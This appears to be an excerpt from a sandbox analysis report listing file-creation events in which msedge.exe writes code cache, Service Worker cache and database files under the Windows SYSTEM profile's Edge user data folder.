    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\5f23ac01b3b23511_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\863476f01ea8d40c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fd3acb4df3be7f9b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4409578f8456196c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\709e3b670a25c685_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f15696bde9e1789c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\19ca4fe1ee6a7a2c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f150d03c1d57b5df_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\aa9a6b283c8e83aa_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3d01d920f09c5762_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\493146bb80205982_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8ac78b8dd4cc4cb2_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a6ef69d92350b333_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4a87a79c6d77000a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2318c14047c90430_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\76b3e43e4836f814_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\af8966ab9f9546d2_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\aad64f036172c1d5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fc42d9ea97e88d4a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b14bd987253be535_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3d540aa27e82fa47_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\093e63eb63a8b292_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\86195d14ffd31e2f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\76bd861a9a6f98d5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\15df4f60a8d34ac6_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\QuotaManager
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2626fa89-4318-493b-8eaf-6cbec6cc6cbc
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\QuotaManager-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2626fa89-4318-493b-8eaf-6cbec6cc6cbc\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2626fa89-4318-493b-8eaf-6cbec6cc6cbc\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\2626fa89-4318-493b-8eaf-6cbec6cc6cbc\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt~RF1fa90a.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\bc10140ccc487cbf_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\6e5d9fe0a946b57f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\18b18d4f42be9dc9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4264252590b436ca_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2194ae212bec996c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\be38a6b167a06314_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\1c7c53ae3c59cfe1_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fe39ccdcb766bff9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c9ea7bef21775c34_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9149d681662a6e39_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7e276c1c0fd04047_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\64ed8a037a2f94fd_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ffcdb4b956c42020_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4cbe4af66b58961c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f4f9c98ed04b5ec4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\561af5d42344f371_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\a67b6886fc3a1533_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f637f397dcea2f5b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2af50681e7e165d7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\33f60a11fe8d3c4d_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\93b41bf2357412b4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7eff83c904ebbf81_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8b65a96eb9aee0b0_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\6840e7e9b84ec2af_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3629afc6d6acd41e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8d22457d87f44ef8_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cbec4dd87a69e757_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9856673ea76d0deb_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\72fe09fceb7e3a78_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt~RF1fad02.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\databases
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\79aca4930c963cc4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\79aca4930c963cc4_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ab1bc50940155da2_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ab1bc50940155da2_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\39336937-69b8-44f3-b3c6-2256654e23aa\51799300f73251f6_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\50d287955aa0db29_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\50d287955aa0db29_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\68cda81435e11c25_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fe8f201a1f9e91cb_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7cf8d65d0897fa22_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\db3679147ce746c5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3ce7e8903a7fd0b1_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3ce7e8903a7fd0b1_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\475fac05b3942ef4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\ebc969827e6e78fa_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\475fac05b3942ef4_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\55a83b115fd80ff7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\55a83b115fd80ff7_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4785f2d1eb413294_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4785f2d1eb413294_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\e723cb04fc3eaad0_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\e723cb04fc3eaad0_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2d7dd16c2cd9221e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2d7dd16c2cd9221e_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b29ae22bf7251723_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b29ae22bf7251723_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\cdf823ec88206886_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\cdf823ec88206886_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\217a7ae8a3007b2b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2669096da0ab2fb6_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2669096da0ab2fb6_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\984b0eb72c6da64b_0
